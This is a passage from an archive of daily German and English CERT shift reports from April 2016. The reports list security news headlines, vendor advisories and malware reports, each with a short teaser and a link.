======================= = End-of-Shift report = ======================= Timeframe: Dienstag 19-04-2016 18:00 − Mittwoch 20-04-2016 18:00 Handler: Stephan Richter Co-Handler: n/a *** Oracle critical updates released, (Wed, Apr 20th) *** --------------------------------------------- Oracle has released their critical updates list. Looking through it there is a very wide range of products, including java that require a fix. Oracle strongly recommends that customers remain on actively-supported versions and apply Critical Patch Update fixes without delay. There are quite a few remotely exploitable, no auth required issues that are addressed by these patches. You may want to peruse the list to see if some of your products are affected. --------------------------------------------- https://isc.sans.edu/diary.html?storyid=20965&rss *** Java: Neue JDK-Versionen bringen strengere Sicherheitsvorgaben *** --------------------------------------------- Die Updates JDK 8u91 und 8u92 adressieren erneut vor allem das Thema Security: Unter anderem gilt der MD5-Algorithmus nun als unsicher, und die JVM bekommt Einstellungen zur Behandlung von Speicherüberlauffehlern. --------------------------------------------- http://heise.de/-3178164 *** Hacking and manipulating traffic sensors *** --------------------------------------------- With the advent of the Internet of Things, we're lucky to have researchers looking into these devices and pointing out the need for securing them better. One of these researchers is Kaspersky Lab's Denis Legezo, who took it upon himself to map the traffic sensors in Moscow and see whether they could be tampered with. The answer to that question is yes, they can be manipulated, and consequently lead to poor traffic management and annoyance... --------------------------------------------- https://www.helpnetsecurity.com/2016/04/20/hacking-manipulating-traffic-sen… *** PoS Malware Steals Credit Card Numbers via DNS Requests *** --------------------------------------------- A new version of the NewPosThings PoS malware is using a clever technique to extract data from infected PoS terminals that almost no security solution monitors for malware activity. --------------------------------------------- http://news.softpedia.com/news/pos-malware-steals-credit-card-numbers-via-d… *** Using a Braun Shaver to Bypass XSS Audit and WAF *** --------------------------------------------- TL;DR: Sometimes you just need to spend a couple of months to exploit a XSS with a hygiene product. --------------------------------------------- https://blog.bugcrowd.com/guest-blog-using-a-braun-shaver-to-bypass-xss-aud… *** Encryption everywhere? *** --------------------------------------------- This article discusses opportunistic encryption (OE), ways to set up systems so that they will automatically encrypt whenever they can rather than just whenever the user requests it. Many types of encryption require a choice by the user - encrypt with PGP rather than sending email in the clear, log into a remote system with... --------------------------------------------- http://resources.infosecinstitute.com/encryption-everywhere/ *** Towards Generic Ransomware Detection *** --------------------------------------------- Im not claiming these ideas are novel, nor unbeatable. My goal is simply to raise awareness about alternate means to help stymie the ransomware epidemic. Plus, attempting to write a tool that could generically protect my computer against OS X ransomware, seemed like a fun challenge! Finally, both this research and tool are version 1.0, meaning, likely room for improvement - so feedback is welcome :) --------------------------------------------- https://objective-see.com/blog/blog_0x0F.html *** DRAM bitflipping exploits that hijack computers just got easier *** --------------------------------------------- Approach relies on already installed code, including widely used glibc library. --------------------------------------------- http://arstechnica.com/security/2016/04/dram-bitflipping-exploits-that-hija… *** Panama Papers - How Hackers Breached the Mossack Fonseca Firm *** --------------------------------------------- Introduction The Panama Papers are a huge trove of high confidential documents stolen from the computer systems of the Panamanian law firm Mossack Fonseca that was leaked online during recently. It is considered the largest data leaks ever, the entire archive contains more than 11.5 Million files including 2.6 Terabytes of data related the activities of offshore... --------------------------------------------- http://resources.infosecinstitute.com/panama-papers-how-hackers-breached-th… *** Kippo and dshield , (Tue, Apr 19th) *** --------------------------------------------- In this diary I will talk about how to configure kippo honeypot and how to submit your kippos log to SANS Dshield --------------------------------------------- https://isc.sans.edu/diary.html?storyid=20963&rss *** Security Update for Microsoft Graphics Component (3148522) Version: 2.0 *** --------------------------------------------- V2.0 (April 19, 2016): To comprehensively address CVE-2016-0145, Microsoft re-released security update 3144432 for affected editions of Microsoft Live Meeting 2007 Console. Customers running Microsoft Live Meeting 2007 Console should install the update to be fully protected from the vulnerability. See Microsoft Knowledge Base Article 3144432 for more information. --------------------------------------------- https://technet.microsoft.com/en-us/library/security/MS16-039 *** Bugtraq: ESA-2016-039: EMC ViPR SRM Multiple Cross-Site Request Forgery Vulnerabilities *** --------------------------------------------- http://www.securityfocus.com/archive/1/538133 *** Cisco IOS and Cisco IOS XE ntp Subsystem Unauthorized Access Vulnerability *** --------------------------------------------- http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-… *** F5 Security Advisory: glibc vulnerability CVE-2015-8779 *** --------------------------------------------- https://support.f5.com:443/kb/en-us/solutions/public/k/39/sol39250133.html?… *** VMSA-2016-0002.1 *** --------------------------------------------- VMware product updates address a critical glibc security vulnerability --------------------------------------------- http://www.vmware.com/security/advisories/VMSA-2016-0002.html *** VMSA-2015-0009.2 *** --------------------------------------------- VMware product updates address a critical deserialization vulnerability --------------------------------------------- http://www.vmware.com/security/advisories/VMSA-2015-0009.html

1 0

Tageszusammenfassung - Dienstag 19-04-2016
by Daily end-of-shift report 19 Apr '16

19 Apr '16

======================= = End-of-Shift report = ======================= Timeframe: Montag 18-04-2016 18:00 − Dienstag 19-04-2016 18:00 Handler: Alexander Riepl Co-Handler: n/a *** Touch ID: 90 Prozent der iPhone-Nutzer setzen jetzt auf Code-Sperre *** --------------------------------------------- Seit der Einführung des Fingerabdruckscanners hat sich laut Apple der Anteil der Nutzer verdoppelt, die ihr iPhone mit einem Gerätecode schützen und damit die Daten verschlüsseln. --------------------------------------------- http://heise.de/-3177095 *** JavaScript-toting spam emails: What should you know and how to avoid them? *** --------------------------------------------- We have recently observed that spam campaigns are now using JavaScript attachments aside from Office files. The purpose of the code is straightforward. It downloads and runs other malware. Some of the JavaScript downloaders .. --------------------------------------------- https://blogs.technet.microsoft.com/mmpc/2016/04/18/javascript-toting-spam-… *** Google Alerts, Direct Webmaster Communication Get Bugs Fixed Quickly *** --------------------------------------------- Google determined that Safe Browsing warnings correlate with quicker remediation times, though not as quick as direct contact with webmasters who have registered with Google Search Console. --------------------------------------------- http://threatpost.com/google-alerts-direct-webmaster-communication-get-bugs… *** Magnitude EK Activity At Its Highest Via AdsTerra Malvertising *** --------------------------------------------- The Magnitude exploit kit is maximizing its leads via a large and uninterrupted malvertising campaign.Categories: ExploitsTags: adsterramagnitude EKmalvertisingterraclicks(Read more...) --------------------------------------------- https://blog.malwarebytes.org/threat-analysis/exploits-threat-analysis/2016… *** iPrint Appliance 2.0 Patch 1 *** --------------------------------------------- Abstract: Patch 1 for the iPrint Appliance 2.0 includes bug fixes.Document ID: 5240661Security Alert: YesDistribution Type: PublicEntitlement Required: NoFiles:iPrint-2.0.0.530.HP.zip (594.99 MB)Products:iPrint Appliance 2Superceded Patches:iPrint Appliance 2.0 FTF --------------------------------------------- https://download.novell.com/Download?buildid=W46YTfqEGiQ~ *** Symantec Messaging Gateway Multiple Security Issues *** --------------------------------------------- Revisions None Severity Severity (CVSS version 2 and CVSS Version 3) CVSS2 Base Score .. --------------------------------------------- http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=se… *** Python-Based PWOBot Targets European Organizations *** --------------------------------------------- We have discovered a malware family named 'PWOBot' that is fairly unique because it is written entirely in Python, and compiled via PyInstaller to generate a Microsoft Windows .. --------------------------------------------- http://researchcenter.paloaltonetworks.com/2016/04/unit42-python-based-pwob… *** Zahlen, bitte! Täglich 390.000 neue Schadprogramme *** --------------------------------------------- Momentan hat man das Gefühl, in jedem Mail-Anhang und hinter jedem Link versteckt sich irgendeine Malware. Antiviren-Hersteller und Test-Labore verstärken diesen Eindruck noch durch irrwitzig hohe Zahlen neuer Schadprogramme. --------------------------------------------- http://heise.de/-3177141 *** 2015 über 550 Millionen Datensätze von Sicherheitslecks betroffen *** --------------------------------------------- Anzahl bekannt gewordener Zero-Day-Lücken mehr als verdoppelt – Entwickler werden schneller beim Ausmerzen --------------------------------------------- http://derstandard.at/2000035195204 *** How-To Disable Windows Script Host *** --------------------------------------------- Numerous spam campaigns are pushing various crypto-ransomware families (and backdoors) via .zip file attachments. And such .zip files typically contain a JScript (.js/.jse) file that, if clicked, will be run via Windows Script Host. Do yourself a favor and edit your Windows Registry .. --------------------------------------------- https://labsblog.f-secure.com/2016/04/19/how-to-disable-windows-script-host/ *** Exploit kit writers turn away from Java, go all-in on Adobe Flash *** --------------------------------------------- 312% increase in Flash vulns over 2014, says study Exploit kit writers are no longer fussed about Java vulnerabilities, focusing their attention almost entirely on Adobe Flash. --------------------------------------------- www.theregister.co.uk/2016/04/19/exploit_kit_writers_love_flash/ *** Homeland Security: Open Source dient der inneren Sicherheit *** --------------------------------------------- Die Offenlegung von Code habe Vorteile bei der "Cybersicherheit" und werde helfen, die Nation vor Gefahren zu schützen, meint der Technikchef der zuständigen US-Behörde. Außerdem könnten Bürger die Behörde dank Open Source besser überwachen, glauben Entwickler. --------------------------------------------- http://www.golem.de/news/homeland-security-open-source-dient-der-inneren-si… *** Tools *** --------------------------------------------- A number of security vulnerabilities have been identified in Citrix XenServer. The following vulnerabilities have been addressed: ... --------------------------------------------- http://support.citrix.com/article/CTX209443 *** Perfides PayPal-Phishing mit angeblicher Eventim-Rechnung *** --------------------------------------------- Eine überdurchschnittlich gut gemachte Phishing-Mail soll PayPal-Kunden in die Datenfalle locken. Die Absender haben sogar beim Header getrickst. --------------------------------------------- http://heise.de/-3177745

1 0

Tageszusammenfassung - Montag 18-04-2016
by Daily end-of-shift report 18 Apr '16

18 Apr '16

======================= = End-of-Shift report = ======================= Timeframe: Freitag 15-04-2016 18:00 − Montag 18-04-2016 18:00 Handler: Alexander Riepl Co-Handler: n/a *** Bugtraq: [SECURITY] [DSA 3550-1] openssh security update *** --------------------------------------------- http://www.securityfocus.com/archive/1/538099 *** Out-of-date apps put 3 million servers at risk of crypto ransomware infections *** --------------------------------------------- 1,600 schools, governments, and aviation companies already backdoored. --------------------------------------------- http://arstechnica.com/security/2016/04/3-million-servers-are-sitting-ducks… *** Chrome extensions will soon have to tell you what data they collect *** --------------------------------------------- Google is about to make it harder for Chrome extensions to collect your browsing data without letting you know about it, according to a new policy announced Friday.Starting in mid-July, developers releasing Chrome extensions .. --------------------------------------------- http://www.cio.com/article/3057259/chrome-extensions-will-soon-have-to-tell… *** How to Write Phishing Templates That Work *** --------------------------------------------- Phish Me Once Phishing isn't hard. Despite all the frightening news reports about ransomware and millions of stolen dollars and identities, people still happily click .. --------------------------------------------- http://resources.infosecinstitute.com/how-to-write-phishing-templates-that-… *** ZDI-16-244: Hewlett Packard Enterprise Vertica validateAdminConfig Remote Command Injection Vulnerability *** --------------------------------------------- This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Hewlett Packard Enterprise Vertica. Authentication is not required to exploit this vulnerability. --------------------------------------------- www.zerodayinitiative.com/advisories/ZDI-16-244/ *** ZDI-16-243: Google Chrome Pdfium JPEG2000 Out-Of-Bounds Read Information Disclosure Vulnerability *** --------------------------------------------- This vulnerability allows an attacker to leak sensitive information on vulnerable installations of Google Chrome. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. --------------------------------------------- http://www.zerodayinitiative.com/advisories/ZDI-16-243/ *** Splunk Enterprise Multiple Flaws Let Remote Users Bypass Security and Deny Service and Remote Authenticated Users Execute Arbitrary Code *** --------------------------------------------- http://www.securitytracker.com/id/1035578 *** 'Blackhole' Exploit Kit Author Gets 7 Years *** --------------------------------------------- A Moscow court this week convicted and sentenced seven hackers for breaking into countless online bank accounts -- including "Paunch," the nickname used by the author of the infamous "Blackhole" exploit kit. Once an extremely .. --------------------------------------------- http://krebsonsecurity.com/2016/04/blackhole-exploit-kit-author-gets-8-year… *** DSA-3551 fuseiso - security update *** --------------------------------------------- It was discovered that fuseiso, a user-space implementation of theISO 9660 file system based on FUSE, contains several vulnerabilities. --------------------------------------------- https://www.debian.org/security/2016/dsa-3551 *** leenk.me <= 2.5.0 - XSS and CSRF *** --------------------------------------------- https://wpvulndb.com/vulnerabilities/8457 *** DSA-3552 tomcat7 - security update *** --------------------------------------------- Multiple security vulnerabilities have been discovered in the Tomcatservlet and JSP engine, which may result in information disclosure,the bypass of CSRF protections and bypass of the SecurityManager. --------------------------------------------- https://www.debian.org/security/2016/dsa-3552 *** FAQ WD <= 1.0.14 - Cross-Site Scripting (XSS) *** --------------------------------------------- https://wpvulndb.com/vulnerabilities/8455 *** e-search <= 1.0 - Unauthenticated Reflected Cross-Site Scripting (XSS) *** --------------------------------------------- https://wpvulndb.com/vulnerabilities/8458 *** Hacking Team hacker explains how he did it *** --------------------------------------------- Some nine moths ago, a hacker that calls himself Phineas Fisher managed to breach the systems and networks of Hacking Team, the (in)famous Italian company that provides offensive intrusion and surveillance software to .. --------------------------------------------- https://www.helpnetsecurity.com/2016/04/18/hacking-team-hacker-explains/ *** Abhörsicherheit: Web.de sichert Mail-Transport zusätzlich per DANE ab *** --------------------------------------------- Der Schritt ist bedeutsam, weil Web.de nicht nur einer der großen deutschen Freemail-Dienste ist, sondern, weil der Mutterkonzern United Internet auch zur Initiative "E-Mail made in Germany" gehört – um die es zuletzt freilich still geworden ist. --------------------------------------------- http://heise.de/-3175333 *** Remote code execution, git, and OS X *** --------------------------------------------- Sometimes I think about all of those pictures which show a bunch of people in startups. They have their office space, which might be big, or it might be small, but they tend to have Macs. Lots of Macs. A lot of them also use git to .. --------------------------------------------- https://rachelbythebay.com/w/2016/04/17/unprotected/ *** Oracle Critical Patch Update Pre-Release Announcement - April 2016 *** --------------------------------------------- This Critical Patch Update Pre-Release Announcement provides advance information about the Oracle Critical Patch Update for April 2016, which will be released on Tuesday, April 19, 2016. While this Pre-Release Announcement is as accurate .. --------------------------------------------- http://www.oracle.com/technetwork/topics/security/cpuapr2016-2881694.html *** Idiot millennials are saving credit card PINs on their mobile phones *** --------------------------------------------- Cleartext passwords are bad, kids, mmmkay? More than one in five 18-24 year olds (21 per cent) store PINs for credit or debit cards on their smartphones, tablets or laptops, according to research conducted by Equifax in conjunction with Gorkana. --------------------------------------------- www.theregister.co.uk/2016/04/18/storing_passwords_smartphone_bad_mkay/ *** Implementation of a Virtual IDS Device in Passive Mode *** --------------------------------------------- The arrival of server, desktop and network virtualization has brought along enormous flexibility in configuration options and a huge drop in installation and operating costs of IT networks. Due .. --------------------------------------------- http://resources.infosecinstitute.com/implementation-of-a-virtual-ids-devic… *** Academic network Janet clobbered with DDoS attacks - again *** --------------------------------------------- Funny how it always gets targeted at the end of term... Blightys government-funded educational network Janet has once again been hit by a cyber attack, with a fresh .. --------------------------------------------- www.theregister.co.uk/2016/04/18/janet_clobbered_with_ddos_attacks_again/ *** Oberösterreichische Firma bei Traktorenkauf auf Internetbetrüger reingefallen *** --------------------------------------------- 40.000 Euro Schaden - Homepage von englischem Anbieter "gefakt" --------------------------------------------- http://derstandard.at/2000035121122

1 0

Tageszusammenfassung - Freitag 15-04-2016
by Daily end-of-shift report 15 Apr '16

15 Apr '16

======================= = End-of-Shift report = ======================= Timeframe: Donnerstag 14-04-2016 18:00 − Freitag 15-04-2016 18:00 Handler: Alexander Riepl Co-Handler: n/a *** Cisco Unified Computing System Platform Emulator Command Injection Vulnerability *** --------------------------------------------- http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-… *** Cisco Unified Computing System Platform Emulator Filename Argument Handling Buffer Overflow Vulnerability *** --------------------------------------------- http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-… *** Vorgebliches Flash-Update installiert unerwünschte Mac-Programme *** --------------------------------------------- Erneut ist ein als Flash-Aktualisierung getarnter Installer im Umlauf, der ungewollte OS-X-Programme einspielt. Ein Entwickler-Zertifikat stellt die Schutzfunktion Gatekeeper ruhig. --------------------------------------------- http://heise.de/-3174793 *** Bedep has raised its game vs Bot Zombies *** --------------------------------------------- http://malware.dontneedcoffee.com/2016/04/bedepantiVM.html *** Xen hugetlbfs Support Lets Local Users on a Guest System Cause Denial of Service Conditions on the Guest System *** --------------------------------------------- http://www.securitytracker.com/id/1035569 *** Banking Trojans Nymaim, Gozi Merge to Steal $4M *** --------------------------------------------- 'Double-headed beast' Trojan, GozNym, drains $4 million from banks in past two weeks. --------------------------------------------- http://threatpost.com/banking-trojans-nymaim-gozi-merge-to-steal-4m/117412/ *** Ransomware authors use the bitcoin blockchain to deliver encryption keys *** --------------------------------------------- Ransomware authors are using the bitcoin blockchain, which serves as the cryptocurrencys public transaction ledger, to deliver decryption keys to victims.The technique, which removes the burden of maintaining a reliable website-based .. --------------------------------------------- http://www.cio.com/article/3056604/ransomware-authors-use-the-bitcoin-block… *** VMSA-2016-0004 *** --------------------------------------------- VMware product updates address a critical security issue in the VMware Client Integration Plugin --------------------------------------------- http://www.vmware.com/security/advisories/VMSA-2016-0004.html *** HTTP Public Key Pinning: How to do it right, (Thu, Apr 14th) *** --------------------------------------------- [Thanks to Felix aka @nexusnode for inspiring this post. Also, see his blog post [1] for more details] One of the underutilizedsecurity measures I mentioned recently was HTTP Public Key Pinning, or HPKP. First again, what is HPKP: HPKP adds a special header to the HTTP response. This header lists hashes .. --------------------------------------------- https://isc.sans.edu/diary.html?storyid=20943 *** Researchers Crack Microsoft and Google's Shortened URLs to Spy on People *** --------------------------------------------- They were even able to identify a young woman whod sought Google Maps directions to a Planned Parenthood clinic. --------------------------------------------- http://www.wired.com/2016/04/researchers-cracked-microsoft-googles-shortene… *** Russia sends exploit kit author to the GULAG for seven years *** --------------------------------------------- ♫ Mothers, dont let your babies grow up to be hackers ♫ The author of the infamous "Blackhole" exploit kit has been sentenced to seven years in a Russian penal colony, local media report. --------------------------------------------- www.theregister.co.uk/2016/04/15/blackhole_paunch_sentence/ *** OGH: Unternehmer bei "Phishing"-Attacke vom Konto selbst schuld *** --------------------------------------------- http://derstandard.at/2000034923248-406 *** AJAX Random Post <= 2.00 - Unauthenticated Reflected Cross-Site Scripting (XSS) *** --------------------------------------------- https://wpvulndb.com/vulnerabilities/8450 *** HDW WordPress Video Gallery <= 1.2 - Unauthenticated Reflected Cross-Site Scripting (XSS) *** --------------------------------------------- https://wpvulndb.com/vulnerabilities/8449 *** Blackberry: Kanadische Polizei besitzt seit 2010 Zentralschlüssel *** --------------------------------------------- Wurde genutzt um über die Jahre Millionen BBM-Nachrichten mitzulesen --------------------------------------------- http://derstandard.at/2000034940341 *** Sierra Wireless ACEmanager Information Exposure Vulnerability *** --------------------------------------------- This advisory contains mitigation details for an exposure of sensitive information vulnerability in the Sierra Wireless ACEmanager application. --------------------------------------------- https://ics-cert.us-cert.gov/advisories/ICSA-16-105-01 *** Accuenergy Acuvim II Series AXM-NET Module Vulnerabilities *** --------------------------------------------- This advisory contains mitigation details for authentication bypass vulnerabilities in Accuenergy's Acuvim II Series AXM-NET module. --------------------------------------------- https://ics-cert.us-cert.gov/advisories/ICSA-16-105-02 *** QuickTime unter Windows deinstallieren - JETZT! *** --------------------------------------------- Da zwei kritische Lücken in QuickTime für Windows klaffen und Apple die Anwendung nicht mehr unterstützt, .. --------------------------------------------- http://heise.de/-3175518

1 0

Tageszusammenfassung - Donnerstag 14-04-2016
by Daily end-of-shift report 14 Apr '16

14 Apr '16

======================= = End-of-Shift report = ======================= Timeframe: Mittwoch 13-04-2016 18:00 − Donnerstag 14-04-2016 18:00 Handler: Alexander Riepl Co-Handler: n/a *** Cisco Unified Computing System Central Software Arbitrary Command Execution Vulnerability *** --------------------------------------------- http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-… *** JSA10733 - 2016-04 Security Bulletin: ScreenOS: Multiple Vulnerabilities in OpenSSL *** --------------------------------------------- http://kb.juniper.net/index?page=content&id=JSA10733&actp=RSS *** JSA10747 - 2016-04 Security Bulletin: QFX Series: PFE panic while processing VXLAN packets (CVE-2016-1274) *** --------------------------------------------- http://kb.juniper.net/index?page=content&id=JSA10747&actp=RSS *** JSA10735 - 2016-04 Security Bulletin: CTP Series: Multiple vulnerabilities in CTP Series *** --------------------------------------------- http://kb.juniper.net/index?page=content&id=JSA10735&actp=RSS *** Cisco Catalyst Switches Network Mobility Services Protocol Port Information Disclosure Vulnerability *** --------------------------------------------- http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-… *** Juniper bleeding data and money: slaps Band-Aids all over Junos OS and warns markets *** --------------------------------------------- Security fixes for privilege escalation, DoS, TLS spoofing and more Junipers code reviewers have been hard at work, and have shipped a bunch of security bug-fixes. --------------------------------------------- www.theregister.co.uk/2016/04/14/juniper_drops_a_bunch_of_junos_os_security… *** Hackers hacking hackers to knacker white hat cracker trackers *** --------------------------------------------- These Russians speak really good Farsi and other signs thieves lack honour ACSC2016 Malware writers are selling each other out to white hats and hacking through each others infrastructure to frame rivals, Shadowservers Richard Perlotto says. --------------------------------------------- www.theregister.co.uk/2016/04/14/there_is_no_honour_among_thieves/ *** Entschlüsselungs-Tool verfügbar? Webseite identifiziert Erpressungs-Trojaner *** --------------------------------------------- Opfer von Verschlüsselungs-Trojanern können auf der Webseite ID Ransomware den Schädling identifizieren und unter anderem Infos zur Möglichkeit einer kostenlosen Entschlüsselung abrufen. --------------------------------------------- http://heise.de/-3173463 *** "Der Bundestrojaner ist staatliche Schadsoftware" *** --------------------------------------------- Für den IT-Experten Rene Pfeiffer ist die staatliche Spionagesoftware kein taugliches Mittel zur .. --------------------------------------------- http://derstandard.at/2000034779830 *** Hacker bringt "Flappy Bird" auf die E-Zigarette *** --------------------------------------------- Ist mit kleinem OLED-Bildschirm ausgestattet - Firmware zum Download gestellt --------------------------------------------- http://derstandard.at/2000034841151 *** Boost - Moderately Critical - Information Disclosure - SA-CONTRIB-2016-021 *** --------------------------------------------- This module provides static page caching for Drupal enabling a very significant performance and scalability boost for sites that receive mostly anonymous traffic.The module doesnt prevent form cache from leaking between anonymous users which .. --------------------------------------------- https://www.drupal.org/node/2705765 *** Features - Less Critical - Denial of Service (DoS) - SA-CONTRIB-2016-020 *** --------------------------------------------- This module enables you to organize and export configuration data.The module doesnt sufficiently protect the admin/structure/features/cleanup path with a token. If an attacker can trick an admin with the .. --------------------------------------------- https://www.drupal.org/node/2705637 *** Badlock: A Lateral Concern *** --------------------------------------------- Yesterday, what seems like the entire InfoSec industry was underwhelmed when Badlock was finally disclosed and, apparently, didn't live up to its billing. While we agree that the month-long buildup to the disclosure, and flashy logo were unnecessary, we'd like to explain why we think this vulnerability will end up providing malicious actors with a .. --------------------------------------------- https://labsblog.f-secure.com/2016/04/14/badlock-a-lateral-concern/ *** Snort Lab: Custom SCADA Protocol IDS Signatures *** --------------------------------------------- In this lab, you are going to learn how to create custom Snort signatures for the Modbus/TCP protocol. First, let's take some time to examine the Modbus TCP Target system. Start the Modbus TCP PLC Target VM. This target simulates .. --------------------------------------------- http://resources.infosecinstitute.com/snort-lab-custom-scada-protocol-ids-s… *** East European Criminal Fastflux Infrastructure *** --------------------------------------------- Fast flux networks allow miscreants to make their network more resistant against takedowns. By updating and changing the A records of a domain rapidly, there is a constant changing list of IPs hosting the domain involved, .. --------------------------------------------- https://blog.team-cymru.org/2016/04/east-european-criminal-fastflux-infrast… *** USB: Digitale Signaturen schützen vor bösartigen oder schlechten Geräten *** --------------------------------------------- USB-Geräte mit Typ-C-Anschluss sollen sich künftig mit kryptografischen Zertifikaten ausweisen, um Malware-Angriffe und Probleme durch inkompatible Netzteile zu vermeiden. --------------------------------------------- http://heise.de/-3173701

1 0

Tageszusammenfassung - Mittwoch 13-04-2016
by Daily end-of-shift report 13 Apr '16

13 Apr '16

======================= = End-of-Shift report = ======================= Timeframe: Dienstag 12-04-2016 18:00 − Mittwoch 13-04-2016 18:00 Handler: Alexander Riepl Co-Handler: Robert Waldner *** [R1] Nessus < 6.6 Fixes Two Vulnerabilities *** --------------------------------------------- Tenable recently worked with Synacktiv to perform security testing for Nessus, as part of an ongoing initiative to proactively address security issues. During the test, their team found two issues that may impact a Nessus vulnerability scanner. Both issues require user authentication to exploit: CVE-2016-82012 - Stored XSS CVE-2016-82013 - XML External Entity (XXE) Expansion DoS --------------------------------------------- http://www.tenable.com/security/tns-2016-08 *** UPDATE: Security Updates Available for Adobe Flash Player (APSB16-10) *** --------------------------------------------- A Security Bulletin (APSB16-10) has been published regarding security updates for Adobe Flash Player. These updates address critical vulnerabilities, and Adobe recommends users update their product installations to the latest versions using the instructions referenced in the security bulletin. --------------------------------------------- https://blogs.adobe.com/psirt/?p=1334 *** Security Bulletins Posted *** --------------------------------------------- Security Bulletins for the Adobe Creative Cloud Desktop Application (APSB16-11) as well as RoboHelp Server (APSB16-12) have been published. Adobe recommends users update their product installations to the latest versions using the instructions referenced in the relevant security bulletin. --------------------------------------------- https://blogs.adobe.com/psirt/?p=1336 *** MS16-APR - Microsoft Security Bulletin Summary for April 2016 - Version: 1.0 *** --------------------------------------------- https://technet.microsoft.com/en-us/library/security/MS16-APR *** ZeuS Banking Trojan Resurfaces As Atmos Variant *** --------------------------------------------- Atmos banking malware has perilous pedigree that includes Citadel and ZeuS. --------------------------------------------- http://threatpost.com/zeus-banking-trojan-resurfaces-as-atmos-variant/11734… *** Website Ransomware - CTB-Locker Goes Blockchain *** --------------------------------------------- During the last couple of years, website ransomware has become one of the most actively developing types of malware. After infamous fake anti-viruses, this it the second most prominent wave of malware that makes money by directly selling 'malware removal' services to users of infected computers. --------------------------------------------- https://blog.sucuri.net/2016/04/website-ransomware-ctb-locker-goes-blockcha… *** Badlock Vulnerability Falls Flat Against Its Hype *** --------------------------------------------- The much anticipated Badlock vulnerability wasn't in the SMB protocol after all, but in SAM and LSAD and exposed Windows machines to privilege escalation. --------------------------------------------- http://threatpost.com/badlock-vulnerability-falls-flat-against-its-hype/117… *** Cisco Unity Connection Cross-Site Scripting Vulnerability *** --------------------------------------------- A vulnerability in the web framework of Cisco Unity Connection could allow an unauthenticated, remote attacker to conduct a cross-site scripting (XSS) attack against the user of the web interface of the affected system. --------------------------------------------- http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-… *** MSRT April release features Bedep detection *** --------------------------------------------- As part of our ongoing effort to provide better malware protection, the Microsoft Malicious Software Removal Tool (MSRT) release this April will include detections for: Win32/Bedep, Trojan family Win32/Upatre, Trojan family Ransom:MSIL/Samas [...] In this blog, we'll focus on the Bedep family of trojans. --------------------------------------------- https://blogs.technet.microsoft.com/mmpc/2016/04/12/msrt-april-release-feat… *** S3 Video Plugin <= 0.983 - Unauthenticated Reflected Cross-Site Scripting (XSS) *** --------------------------------------------- https://wpvulndb.com/vulnerabilities/8442 *** Patchday: Microsoft stopft 13 Lücken, Adobe lässt es ruhig angehen *** --------------------------------------------- Microsoft stellt Sicherheitspatches für sechs als kritisch und sieben als wichtig eingestufte Schwachstellen in Windows & Co. bereit. Adobe flickt diesen Monat lediglich jeweils eine kritische und wichtige Lücke. --------------------------------------------- http://heise.de/-3171881 *** Badlock *** --------------------------------------------- Gestern abend haben Microsoft und das Samba-Projekt Patches zum lange angekündigten (und mancherorts medial auch gut aufgebauschten) sog. "Badlock"-Bug (CVE-2016-0128) veröffentlicht [...] Inhaltlich ist das nicht wirklich tragisch - ein "Man-in-the-middle" könnte eine SMB-Verbindung übernehmen. Da SMB-Verbindungen normalerweise nur in lokalen Netzen oder via VPN aufgebaut werden, hält sich der Impact in Grenzen. --------------------------------------------- http://www.cert.at/services/blog/20160413110435-1730.html *** Siemens Industrial Products glibc Library Vulnerability *** --------------------------------------------- This advisory contains mitigation details for a buffer overflow vulnerability in the glibc library affecting several of the Siemens industrial products. --------------------------------------------- https://ics-cert.us-cert.gov/advisories/ICSA-16-103-01 *** Siemens SCALANCE S613 Denial-of-Service Vulnerability *** --------------------------------------------- This advisory contains mitigation details for a resource exhaustion vulnerability that causes a denial-of-service condition in the Siemens SCALANCE S613 device. --------------------------------------------- https://ics-cert.us-cert.gov/advisories/ICSA-16-103-02 *** Siemens Industrial Products DROWN Vulnerability *** --------------------------------------------- This advisory contains mitigation details for a DROWN attack that can affect some Siemens industrial products under certain conditions. --------------------------------------------- https://ics-cert.us-cert.gov/advisories/ICSA-16-103-03 *** Honeywell Uniformance PHD Denial Of Service *** --------------------------------------------- This advisory was originally posted to the US-CERT secure Portal library on March 10, 2016, and is being released to the NCCIC/ICS-CERT web site. This advisory contains mitigation details for a denial-of-service vulnerability in the Uniformance Process History Database (PHD). --------------------------------------------- https://ics-cert.us-cert.gov/advisories/ICSA-16-070-02 *** Broken IBM Java Patch Prompts Another Disclosure *** --------------------------------------------- Current versions of IBM SDK 7 and SDK 8 remain vulnerable to a 2013 Java vulnerability. Security Explorations discovered the original patch is broken and disclosed details on the flaw and a proof-of-concept exploit. --------------------------------------------- http://threatpost.com/broken-ibm-java-patch-prompts-another-disclosure/1173… *** DFN-CERT-2016-0601/">NVIDIA GPU-Treiber: Mehrere Schwachstellen ermöglichen u.a. Privilegieneskalation *** --------------------------------------------- https://portal.cert.dfn.de/adv/DFN-CERT-2016-0601/

1 0

Tageszusammenfassung - Dienstag 12-04-2016
by Daily end-of-shift report 12 Apr '16

12 Apr '16

======================= = End-of-Shift report = ======================= Timeframe: Montag 11-04-2016 18:00 − Dienstag 12-04-2016 18:00 Handler: Alexander Riepl Co-Handler: n/a *** Manamecrypt - a ransomware that takes a different route *** --------------------------------------------- Hardly a week passes these days without a new family of ransomware making the headlines. This week our analysts are taking apart Manamecrypt, also referred to as CryptoHost. Basically, Manamecrypt is a ransomware Trojan horse, but it differs from other ransomware families in a number of aspects. For .. --------------------------------------------- https://blog.gdatasoftware.com/2016/04/28234-manamecrypt-a-ransomware-that-… *** Von IP-Adressen, Kloschüsseln und einer abgelegenen Farm *** --------------------------------------------- Kansas ist das Herz des Cybercrime - zumindest wenn man einer Anwendung glauben schenkt, die IP-Adressen auf einer Karte verortet. Tatsächlich leben dort unschuldige Menschen, die nun viele wütende Anrufe und Kloschüsseln bekommen. --------------------------------------------- http://www.golem.de/news/skurrile-belaestigungen-von-ip-adressen-kloschuess… *** KickassTorrent touts adoption of two-factor authentication *** --------------------------------------------- A torrent site has added an extra layer of security for users logging in. --------------------------------------------- http://www.scmagazine.com/kickasstorrent-touts-adoption-of-two-factor-authe… *** Rokku Ransomware shows 